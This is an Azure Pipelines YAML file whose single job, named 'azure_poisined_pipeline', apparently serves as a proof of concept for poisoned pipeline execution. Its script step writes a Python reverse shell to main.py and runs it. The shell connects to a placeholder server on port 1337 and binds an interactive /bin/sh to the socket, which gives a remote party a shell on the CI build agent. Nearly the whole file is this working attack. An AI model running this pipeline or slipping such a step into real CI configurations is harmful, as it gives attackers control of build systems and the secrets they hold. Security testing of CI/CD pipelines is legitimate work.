pool: Default
jobs:
- job: azure_poisined_pipeline
  steps:
  - script: |
      python3 --version
      cat > main.py<<EOF 
      import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('<server>',1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(['/bin/sh','-i']);
      EOF
      python3  main.py
